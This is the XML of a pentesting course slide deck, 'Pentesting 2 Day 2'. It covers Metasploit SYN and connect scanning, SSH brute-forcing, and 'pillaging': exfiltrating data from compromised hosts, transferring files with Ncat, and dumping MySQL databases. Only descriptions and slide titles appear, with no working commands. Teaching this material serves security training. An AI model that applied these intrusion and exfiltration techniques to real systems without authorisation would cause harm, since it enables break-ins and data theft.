          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2800775" y="1311025"/>
            <a:ext cx="5446500" cy="2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Pillaging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process of collecting information by exfiltrating valuable data from a compromised host.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1" name="Google Shape;1051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52" name="Google Shape;1052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3" name="Google Shape;10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50" y="1393788"/>
            <a:ext cx="1491225" cy="21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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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59" name="Google Shape;1059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0" name="Google Shape;1060;p5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61" name="Google Shape;1061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67" name="Google Shape;1067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Metasploit has modules for three types of scanning:</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068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069" name="Google Shape;1069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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="386125" y="1144600"/>
            <a:ext cx="8416800" cy="3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Port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For performing TCP connect and SYN scans.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Service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For detecting the version of a specific services and for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fuzzing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target systems.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Fuzzing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act of sending fake data in order to "trick" the service into behaving a certain way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Post Exploitation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Can run on compromised hosts after you've hacked into them to scan for information like a list of installed applications, users, running processes/services, and stored credentials for user applications.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0" y="2623513"/>
            <a:ext cx="364795" cy="5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77" name="Google Shape;1077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Today, we will focus on using Metasploit for port scanning. </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1078" name="Google Shape;1078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79" name="Google Shape;1079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Metasploit scanners work just like any other Metasploit Module. Using these scanners requires the following steps: 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search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> for the module 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" sz="1800"/>
              <a:t> the module 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800"/>
              <a:t> the module’s option </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="9144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800"/>
              <a:t> the scanner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Next we’ll demonstrate these steps with Metasploit’s SYN scan module.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086" name="Google Shape;1086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SYN Scanning with Metasploit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1093" name="Google Shape;1093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94" name="Google Shape;1094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Scanning with Metasploit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use Metasploit to perform SYN and Connect scans; detect if an SSH server is vulnerable to dictionary attack; and then brute-force it.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1804</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>239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Courier</vt:lpstr>
      <vt:lpstr>Roboto Medium</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Roboto Thin</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Roboto Mono</vt:lpstr>
      <vt:lpstr>Roboto Light</vt:lpstr>
      <vt:lpstr>Simple Light</vt:lpstr>
      <vt:lpstr>Pentesting 2 Day 2</vt:lpstr>
      <vt:lpstr>Class Objectives</vt:lpstr>
      <vt:lpstr>After gaining access to an SSH server via brute force, the attacker can pillage the compromised host. </vt:lpstr>
      <vt:lpstr>Pillaging is process of collecting information by exfiltrating valuable data from a compromised host. </vt:lpstr>
      <vt:lpstr>Scanning with Metasploit</vt:lpstr>
      <vt:lpstr>Scanning with Metasploit</vt:lpstr>
      <vt:lpstr>Scanning with Metasploit</vt:lpstr>
      <vt:lpstr>SYN Scanning with Metasploit</vt:lpstr>
      <vt:lpstr>25 Minutes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Scanning with Metasploit Review</vt:lpstr>
      <vt:lpstr>Scanning with Metasploit Review</vt:lpstr>
      <vt:lpstr>Scanning with Metasploit Review</vt:lpstr>
      <vt:lpstr>Scanning with Metasploit Review</vt:lpstr>
      <vt:lpstr>Scanning with Metasploit Review</vt:lpstr>
      <vt:lpstr>Scanning with Metasploit Review</vt:lpstr>
      <vt:lpstr>Information gathering and Transfering Files with Ncat </vt:lpstr>
      <vt:lpstr>Data Exfiltration / Pillaging </vt:lpstr>
      <vt:lpstr>Data Exfiltration / Pillaging </vt:lpstr>
      <vt:lpstr>Data Exfiltration / Pillaging </vt:lpstr>
      <vt:lpstr>Data Exfiltration / Pillaging </vt:lpstr>
      <vt:lpstr>Data Exfiltration / Pillaging </vt:lpstr>
      <vt:lpstr>Data Exfiltration / Pillaging </vt:lpstr>
      <vt:lpstr>Collecting Information, Running Services, and Transfering Files</vt:lpstr>
      <vt:lpstr>Collecting Information Demo</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>30 Minutes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Pillaging SQL Databases</vt:lpstr>
      <vt:lpstr>Pillaging SQL Databases</vt:lpstr>
      <vt:lpstr>MySQL Commands</vt:lpstr>
      <vt:lpstr>Dumping Databases</vt:lpstr>
      <vt:lpstr>Interacting with MySQL and Dumping Databases</vt:lpstr>
      <vt:lpstr>30 Minutes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Pillaging SQL Database Review</vt:lpstr>
      <vt:lpstr>Class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Pentesting 2 Day 2</dc:title>
  <cp:lastModifiedBy>Tony Wilson</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-09T22:31:01Z</dcterms:modified>
</cp:coreProperties>
</file>